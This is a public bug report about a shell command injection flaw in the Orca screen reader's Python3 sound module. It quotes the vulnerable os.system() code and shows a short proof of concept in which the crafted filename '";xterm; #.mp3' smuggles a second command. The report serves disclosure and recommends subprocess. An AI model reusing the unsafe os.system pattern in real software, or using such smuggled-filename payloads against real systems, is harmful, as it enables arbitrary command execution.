Orca : Python3 Sound Module -- Shell Command Injection

Bug #1477724 reported by Bernd Dietzel
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Linux Mint
New
Undecided
Unassigned

Bug Description

The python3 Orca module named "sound" can be used to inject Shell Commands.

File :
/usr/lib/python3/dist-packages/orca/sound.py

The os.system() call in the sound.py file uses self.path wich is the attac verctor.

line 49-53 :
            import os
            os.system(
                'gst-launch filesrc location="%s" ! wavparse '\
                '! autoaudiosink > /dev/null 2>&1 &'\
                % self._path) ######## < ------- Here is the Problem

--------

Exploid Demo wich runs the program xterm when a bad pathname is used to play a sound :

theregrunner@mint17 : ~ $ python3
Python 3.4.0 (default, Jun 19 2015, 14:18:46)
[GCC 4.8.2] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from orca import sound
>>> self=sound.Sound
>>> self.__init__(self,'";xterm; #.mp3')
>>> self.play(self)

------------

See the attached screenshot

Please use subprocess , not os.system.

Thank you :-)

Revision history for this message
Bernd Dietzel (l-ubuntuone1104) wrote :
description: updated
Revision history for this message
Bernd Dietzel (l-ubuntuone1104) wrote :

Update :
I reported the bug to the gnome Project.

The Module will be removed !

https://bugzilla.gnome.org/show_bug.cgi?id=752796

so this issue can be closed :-)

information type: Public → Public Security
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Bug attachments

Remote bug watches

Bug watches keep track of this bug in other bug trackers.